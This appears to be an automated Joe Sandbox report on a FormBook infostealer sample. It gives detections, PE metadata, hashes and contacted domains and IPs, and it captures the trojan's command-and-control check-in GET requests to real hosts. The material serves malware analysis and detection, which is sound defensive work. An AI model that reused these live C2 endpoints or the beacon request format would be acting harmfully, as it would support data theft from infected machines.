Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.dragonmodz.net/udeh/?Ipp=dUteF4ZXLzuJCUcYdQc1YLLQWaT61UR38kyqHblZtlDA/JK3c3P/1iwgVtH+FS5JjCNv5C6f7A==&w8e=oTrd | 0% | Avira URL Cloud | safe
http://www.qzttb.net/udeh/?Ipp=0GJ3uF0xqxUvxNgo0ZAG0/AKZrovZvEja3W0Pwl2ZRVpe8mYbBKREVo+7yTMDi1lrzUfYpfKkw==&w8e=oTrd | 0% | Avira URL Cloud | safe
http://www.royaldears.com/udeh/?Ipp=v0MSI9GJGiZ1sOz/LzfG2QhElsQnBWapnw3k3ldXy2xTual36y4oBDIxb66ss1xce1kRKjOJbQ==&w8e=oTrd | 0% | Avira URL Cloud | safe
www.spoiledzone.com/udeh/ | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.qzttb.net | 154.94.210.101 | true | true | - | unknown
www.royaldears.com | 3.64.163.50 | true | true | - | unknown
www.dragonmodz.net | 142.252.22.166 | true | true | - | unknown
www.pittsburghdata.center | 209.17.116.163 | true | true | - | unknown
www.blueprintroslyn.com | unknown | unknown | true | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.dragonmodz.net/udeh/?Ipp=dUteF4ZXLzuJCUcYdQc1YLLQWaT61UR38kyqHblZtlDA/JK3c3P/1iwgVtH+FS5JjCNv5C6f7A==&w8e=oTrd | true | Avira URL Cloud: safe | unknown
http://www.qzttb.net/udeh/?Ipp=0GJ3uF0xqxUvxNgo0ZAG0/AKZrovZvEja3W0Pwl2ZRVpe8mYbBKREVo+7yTMDi1lrzUfYpfKkw==&w8e=oTrd | true | Avira URL Cloud: safe | unknown
http://www.royaldears.com/udeh/?Ipp=v0MSI9GJGiZ1sOz/LzfG2QhElsQnBWapnw3k3ldXy2xTual36y4oBDIxb66ss1xce1kRKjOJbQ==&w8e=oTrd | true | Avira URL Cloud: safe | unknown
www.spoiledzone.com/udeh/ | true | Avira URL Cloud: safe | low

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000005.00000000.381972183.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.396876565.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.358537483.000000000095C000.00000004.00000020.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | cK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp | false | - | high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
142.252.22.166 | www.dragonmodz.net | United States | 18779 | EGIHOSTINGUS | true
154.94.210.101 | www.qzttb.net | Seychelles | 32708 | ROOTNETWORKSUS | true
3.64.163.50 | www.royaldears.com | United States | 16509 | AMAZON-02US | true
209.17.116.163 | www.pittsburghdata.center | United States | 55002 | DEFENSE-NETUS | true

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:528618
                        Start date:25.11.2021
                        Start time:15:09:16
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 11m 33s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:cK1g5gckZR9VHjj.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:24
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@9/1@7/4
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 13.9% (good quality ratio 12.4%)
                        • Quality average: 72.5%
                        • Quality standard deviation: 32.1%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 127
                        • Number of non-executed functions: 151
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 51.104.136.2, 51.11.168.232, 131.253.33.200, 13.107.22.200
                        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, arc.msn.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, dual-a-0001.dc-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                        • Not all processes were analyzed; the report is missing behavior information
                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/528618/sample/cK1g5gckZR9VHjj.exe

                        Simulations

                        Behavior and APIs

                        Time | Type | Description
                        15:10:15 | API Interceptor | 27x Sleep call for process: cK1g5gckZR9VHjj.exe modified

                        Joe Sandbox View / Context

                        IPs

                        Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                        Domains

                        No context

                        ASN

                        Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\cK1g5gckZR9VHjj.exe.log
                        Process:C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):2239
                        Entropy (8bit):5.354287817410997
                        Encrypted:false
                        SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                        MD5:913D1EEA179415C6D08FB255AE42B99D
                        SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                        SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                        SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.842673281078141
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        • Win32 Executable (generic) a (10002005/4) 49.78%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:cK1g5gckZR9VHjj.exe
                        File size:445440
                        MD5:5f19b9a3e41ef2e6ec3200bf4a246cec
                        SHA1:25638b49edf7444005e1e02fb5d972da5920e1d8
                        SHA256:afac806262706aea36f8c34cb56ffa94f49da9b39b752cfd077f9b921e972c1d
                        SHA512:9819afc87fe9dc827cfdaf7a676ab8e01f7e419ac09e354cbb3270e167527db2ffea6d61fbe46469c14e3a8a2689f26c98712606e0878294167ed7e15e6fb2c5
                        SSDEEP:12288:G/NdU0VixBFmkJ+W/wCCGBRG5F2ZBGutgq:G/vU0Vi1nJ+dCPukAuJ
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...hI.a..............0.................. ........@.. .......................@............@................................

                        File Icon

                        Icon Hash:00828e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0x46e0b6
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x619F4968 [Thu Nov 25 08:29:28 2021 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:v4.0.30319
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                        Entrypoint Preview

                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [ebp+0800000Eh], ch
                        add byte ptr [eax], al

                        Data Directories

                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6e064 | 0x4f | .text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x70000 | 0x5c4 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0xc | .reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                        Sections

                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        .text | 0x2000 | 0x6c0cc | 0x6c200 | False | 0.883977601156 | data | 7.85526570093 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rsrc | 0x70000 | 0x5c4 | 0x600 | False | 0.4296875 | data | 4.13349213194 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc | 0x72000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        Name | RVA | Size | Type | Language | Country
                        RT_VERSION | 0x70090 | 0x334 | data | |
                        RT_MANIFEST | 0x703d4 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                        Imports

                        DLL | Import
                        mscoree.dll | _CorExeMain

                        Version Infos

                        Description | Data
                        Translation | 0x0000 0x04b0
                        LegalCopyright | Copyright Rogers Peet
                        Assembly Version | 8.0.6.0
                        InternalName | IVectorVi.exe
                        FileVersion | 5.6.0.0
                        CompanyName | Rogers Peet
                        LegalTrademarks |
                        Comments |
                        ProductName | Biblan
                        ProductVersion | 5.6.0.0
                        FileDescription | Biblan
                        OriginalFilename | IVectorVi.exe

                        Network Behavior

                        Snort IDS Alerts

                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                        11/25/21-15:11:39.736402 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.6 | 8.8.8.8
                        11/25/21-15:11:41.436557 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49801 | 80 | 192.168.2.6 | 3.64.163.50
                        11/25/21-15:11:41.436557 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49801 | 80 | 192.168.2.6 | 3.64.163.50
                        11/25/21-15:11:41.436557 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49801 | 80 | 192.168.2.6 | 3.64.163.50

                        Network Port Distribution

                        TCP Packets

                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Nov 25, 2021 15:11:35.934700012 CET | 49779 | 80 | 192.168.2.6 | 154.94.210.101
                        Nov 25, 2021 15:11:36.124350071 CET | 80 | 49779 | 154.94.210.101 | 192.168.2.6
                        Nov 25, 2021 15:11:36.124520063 CET | 49779 | 80 | 192.168.2.6 | 154.94.210.101
                        Nov 25, 2021 15:11:36.125092030 CET | 49779 | 80 | 192.168.2.6 | 154.94.210.101
                        Nov 25, 2021 15:11:36.336148024 CET | 80 | 49779 | 154.94.210.101 | 192.168.2.6
                        Nov 25, 2021 15:11:36.336168051 CET | 80 | 49779 | 154.94.210.101 | 192.168.2.6
                        Nov 25, 2021 15:11:36.336180925 CET | 80 | 49779 | 154.94.210.101 | 192.168.2.6
                        Nov 25, 2021 15:11:36.336196899 CET | 80 | 49779 | 154.94.210.101 | 192.168.2.6
                        Nov 25, 2021 15:11:36.336213112 CET | 80 | 49779 | 154.94.210.101 | 192.168.2.6
                        Nov 25, 2021 15:11:36.336227894 CET | 80 | 49779 | 154.94.210.101 | 192.168.2.6
                        Nov 25, 2021 15:11:36.336288929 CET | 49779 | 80 | 192.168.2.6 | 154.94.210.101
                        Nov 25, 2021 15:11:36.336435080 CET | 49779 | 80 | 192.168.2.6 | 154.94.210.101
                        Nov 25, 2021 15:11:36.336544037 CET | 49779 | 80 | 192.168.2.6 | 154.94.210.101
                        Nov 25, 2021 15:11:36.526585102 CET | 80 | 49779 | 154.94.210.101 | 192.168.2.6
                        Nov 25, 2021 15:11:41.411189079 CET | 49801 | 80 | 192.168.2.6 | 3.64.163.50
                        Nov 25, 2021 15:11:41.434387922 CET | 80 | 49801 | 3.64.163.50 | 192.168.2.6
                        Nov 25, 2021 15:11:41.436362982 CET | 49801 | 80 | 192.168.2.6 | 3.64.163.50
                        Nov 25, 2021 15:11:41.436557055 CET | 49801 | 80 | 192.168.2.6 | 3.64.163.50
                        Nov 25, 2021 15:11:41.456016064 CET | 80 | 49801 | 3.64.163.50 | 192.168.2.6
                        Nov 25, 2021 15:11:41.456082106 CET | 80 | 49801 | 3.64.163.50 | 192.168.2.6
                        Nov 25, 2021 15:11:41.456110954 CET | 80 | 49801 | 3.64.163.50 | 192.168.2.6
                        Nov 25, 2021 15:11:41.456293106 CET | 49801 | 80 | 192.168.2.6 | 3.64.163.50
                        Nov 25, 2021 15:11:41.456537008 CET | 49801 | 80 | 192.168.2.6 | 3.64.163.50
                        Nov 25, 2021 15:11:41.475897074 CET | 80 | 49801 | 3.64.163.50 | 192.168.2.6
                        Nov 25, 2021 15:11:46.683671951 CET | 49821 | 80 | 192.168.2.6 | 142.252.22.166
                        Nov 25, 2021 15:11:46.852204084 CET | 80 | 49821 | 142.252.22.166 | 192.168.2.6
                        Nov 25, 2021 15:11:46.852335930 CET | 49821 | 80 | 192.168.2.6 | 142.252.22.166
                        Nov 25, 2021 15:11:46.852530956 CET | 49821 | 80 | 192.168.2.6 | 142.252.22.166
                        Nov 25, 2021 15:11:47.031126976 CET | 80 | 49821 | 142.252.22.166 | 192.168.2.6
                        Nov 25, 2021 15:11:47.031146049 CET | 80 | 49821 | 142.252.22.166 | 192.168.2.6
                        Nov 25, 2021 15:11:47.031155109 CET | 80 | 49821 | 142.252.22.166 | 192.168.2.6
                        Nov 25, 2021 15:11:47.031323910 CET | 49821 | 80 | 192.168.2.6 | 142.252.22.166
                        Nov 25, 2021 15:11:47.031456947 CET | 49821 | 80 | 192.168.2.6 | 142.252.22.166
                        Nov 25, 2021 15:11:47.201138973 CET | 80 | 49821 | 142.252.22.166 | 192.168.2.6
                        Nov 25, 2021 15:12:02.310941935 CET | 49825 | 80 | 192.168.2.6 | 209.17.116.163
                        Nov 25, 2021 15:12:05.311918974 CET | 49825 | 80 | 192.168.2.6 | 209.17.116.163
                        Nov 25, 2021 15:12:11.312515974 CET | 49825 | 80 | 192.168.2.6 | 209.17.116.163
                        Nov 25, 2021 15:12:23.998922110 CET | 49849 | 80 | 192.168.2.6 | 209.17.116.163

                        UDP Packets

                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Nov 25, 2021 15:11:34.718662977 CET | 53781 | 53 | 192.168.2.6 | 8.8.8.8
                        Nov 25, 2021 15:11:35.732012987 CET | 53781 | 53 | 192.168.2.6 | 8.8.8.8
                        Nov 25, 2021 15:11:35.928148031 CET | 53 | 53781 | 8.8.8.8 | 192.168.2.6
                        Nov 25, 2021 15:11:39.736213923 CET | 53 | 53781 | 8.8.8.8 | 192.168.2.6
                        Nov 25, 2021 15:11:41.348179102 CET | 54982 | 53 | 192.168.2.6 | 8.8.8.8
                        Nov 25, 2021 15:11:41.409744024 CET | 53 | 54982 | 8.8.8.8 | 192.168.2.6
                        Nov 25, 2021 15:11:46.591064930 CET | 63718 | 53 | 192.168.2.6 | 8.8.8.8
                        Nov 25, 2021 15:11:46.682406902 CET | 53 | 63718 | 8.8.8.8 | 192.168.2.6
                        Nov 25, 2021 15:11:57.075520992 CET | 62116 | 53 | 192.168.2.6 | 8.8.8.8
                        Nov 25, 2021 15:11:57.112966061 CET | 53 | 62116 | 8.8.8.8 | 192.168.2.6
                        Nov 25, 2021 15:12:02.135910988 CET | 63816 | 53 | 192.168.2.6 | 8.8.8.8
                        Nov 25, 2021 15:12:02.309823036 CET | 53 | 63816 | 8.8.8.8 | 192.168.2.6
                        Nov 25, 2021 15:12:23.801845074 CET | 62208 | 53 | 192.168.2.6 | 8.8.8.8
                        Nov 25, 2021 15:12:23.989738941 CET | 53 | 62208 | 8.8.8.8 | 192.168.2.6

                        ICMP Packets

                        Timestamp | Source IP | Dest IP | Checksum | Code | Type
                        Nov 25, 2021 15:11:39.736402035 CET | 192.168.2.6 | 8.8.8.8 | cff3 | (Port unreachable) | Destination Unreachable

                        DNS Queries

                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                        Nov 25, 2021 15:11:34.718662977 CET | 192.168.2.6 | 8.8.8.8 | 0xa06c | Standard query (0) | www.qzttb.net | A (IP address) | IN (0x0001)
                        Nov 25, 2021 15:11:35.732012987 CET | 192.168.2.6 | 8.8.8.8 | 0xa06c | Standard query (0) | www.qzttb.net | A (IP address) | IN (0x0001)
                        Nov 25, 2021 15:11:41.348179102 CET | 192.168.2.6 | 8.8.8.8 | 0xe11f | Standard query (0) | www.royaldears.com | A (IP address) | IN (0x0001)
                        Nov 25, 2021 15:11:46.591064930 CET | 192.168.2.6 | 8.8.8.8 | 0x209c | Standard query (0) | www.dragonmodz.net | A (IP address) | IN (0x0001)
                        Nov 25, 2021 15:11:57.075520992 CET | 192.168.2.6 | 8.8.8.8 | 0x35bb | Standard query (0) | www.blueprintroslyn.com | A (IP address) | IN (0x0001)
                        Nov 25, 2021 15:12:02.135910988 CET | 192.168.2.6 | 8.8.8.8 | 0x140 | Standard query (0) | www.pittsburghdata.center | A (IP address) | IN (0x0001)
                        Nov 25, 2021 15:12:23.801845074 CET | 192.168.2.6 | 8.8.8.8 | 0xe244 | Standard query (0) | www.pittsburghdata.center | A (IP address) | IN (0x0001)

                        DNS Answers

                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                        Nov 25, 2021 15:11:35.928148031 CET | 8.8.8.8 | 192.168.2.6 | 0xa06c | No error (0) | www.qzttb.net | | 154.94.210.101 | A (IP address) | IN (0x0001)
                        Nov 25, 2021 15:11:39.736213923 CET | 8.8.8.8 | 192.168.2.6 | 0xa06c | Server failure (2) | www.qzttb.net | none | none | A (IP address) | IN (0x0001)
                        Nov 25, 2021 15:11:41.409744024 CET | 8.8.8.8 | 192.168.2.6 | 0xe11f | No error (0) | www.royaldears.com | | 3.64.163.50 | A (IP address) | IN (0x0001)
                        Nov 25, 2021 15:11:46.682406902 CET | 8.8.8.8 | 192.168.2.6 | 0x209c | No error (0) | www.dragonmodz.net | | 142.252.22.166 | A (IP address) | IN (0x0001)
                        Nov 25, 2021 15:11:57.112966061 CET | 8.8.8.8 | 192.168.2.6 | 0x35bb | Name error (3) | www.blueprintroslyn.com | none | none | A (IP address) | IN (0x0001)
                        Nov 25, 2021 15:12:02.309823036 CET | 8.8.8.8 | 192.168.2.6 | 0x140 | No error (0) | www.pittsburghdata.center | | 209.17.116.163 | A (IP address) | IN (0x0001)
                        Nov 25, 2021 15:12:23.989738941 CET | 8.8.8.8 | 192.168.2.6 | 0xe244 | No error (0) | www.pittsburghdata.center | | 209.17.116.163 | A (IP address) | IN (0x0001)

                        HTTP Request Dependency Graph

                        • www.qzttb.net
                        • www.royaldears.com
                        • www.dragonmodz.net

                        HTTP Packets

                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        0 | 192.168.2.6 | 49779 | 154.94.210.101 | 80 | C:\Windows\explorer.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Nov 25, 2021 15:11:36.125092030 CET | 11598 | OUT | GET /udeh/?Ipp=0GJ3uF0xqxUvxNgo0ZAG0/AKZrovZvEja3W0Pwl2ZRVpe8mYbBKREVo+7yTMDi1lrzUfYpfKkw==&w8e=oTrd HTTP/1.1
                        Host: www.qzttb.net
                        Connection: close
                        Data Raw: 00 00 00 00 00 00 00
                        Data Ascii:
                        Nov 25, 2021 15:11:36.336148024 CET | 12007 | IN | HTTP/1.1 404 Not Found
                        Content-Type: text/html; charset=utf-8
                        Server: Microsoft-IIS/10.0
                        X-Powered-By: PHP/7.0.33
                        X-Powered-By: ASP.NET
                        Date: Thu, 25 Nov 2021 14:11:35 GMT
                        Connection: close
                        Content-Length: 7447
                        Data Ascii: <!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>System Error</title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <style> /* Base */ body { color: #333; font: 14px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; word-break: break-word; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3.subheading { color: #4288ce; margin: 6px 0 0; font-weight: 400; } h3{ margin: 12px; font-size: 16px; font-weight: bold;
                        Nov 25, 2021 15:11:36.336168051 CET | 12008 | IN | Data Raw: 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 61 62 62 72 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 68 65 6c 70 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75
                        Data Ascii: } abbr{ cursor: help; text-decoration: underline; text-decoration-style: dotted; } a{ color: #868686; cursor: pointer; } a:hov
                        Nov 25, 2021 15:11:36.336180925 CET | 12009 | IN | Data Raw: 45 78 63 65 70 74 69 6f 6e 20 49 6e 66 6f 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 2e 65 78 63 65 70 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d
                        Data Ascii: Exception Info */ .exception { margin-top: 20px; } .exception .message{ padding: 12px; border: 1px solid #ddd; border-bottom: 0 none; line-height: 18px
                        Nov 25, 2021 15:11:36.336196899 CET | 12011 | IN | Data Raw: 6f 64 65 20 70 72 65 20 6c 69 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0d 0a
                        Data Ascii: ode pre li{ border-left: 1px solid #ddd; height: 18px; line-height: 18px; } .exception .source-code pre code{ color: #333; height: 100%; display: i
                        Nov 25, 2021 15:11:36.336213112 CET | 12012 | IN | Data Raw: 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 65 78 63 65 70 74 69
                        Data Ascii: font-weight: bold; padding: 6px 0; } .exception-var table caption small{ font-weight: 300; display: inline-block; margin-left: 10px; color: #ccc;
                        Nov 25, 2021 15:11:36.336227894 CET | 12013 | IN | Data Raw: 20 20 20 20 20 20 70 72 65 2e 70 72 65 74 74 79 70 72 69 6e 74 20 2e 6c 69 74 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 36 36 20 7d 20 20 2f 2a 20 61 20 6c 69 74 65 72 61 6c 20 76 61 6c 75 65 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 2f 2a 20 70 75 6e 63
                        Data Ascii: pre.prettyprint .lit { color: #066 } /* a literal value */ /* punctuation, lisp open bracket, lisp close bracket */ pre.prettyprint .pun, pre.prettyprint .opn, pre.prettyprint .clo { color: #660 } pre.prettypr


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        1 | 192.168.2.6 | 49801 | 3.64.163.50 | 80 | C:\Windows\explorer.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Nov 25, 2021 15:11:41.436557055 CET | 15048 | OUT | GET /udeh/?Ipp=v0MSI9GJGiZ1sOz/LzfG2QhElsQnBWapnw3k3ldXy2xTual36y4oBDIxb66ss1xce1kRKjOJbQ==&w8e=oTrd HTTP/1.1
                        Host: www.royaldears.com
                        Connection: close
                        Data Raw: 00 00 00 00 00 00 00
                        Data Ascii:
                        Nov 25, 2021 15:11:41.456082106 CET | 15049 | IN | HTTP/1.1 410 Gone
                        Server: openresty
                        Date: Thu, 25 Nov 2021 14:11:41 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 72 6f 79 61 6c 64 65 61 72 73 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 61 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 72 6f 79 61 6c 64 65 61 72 73 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
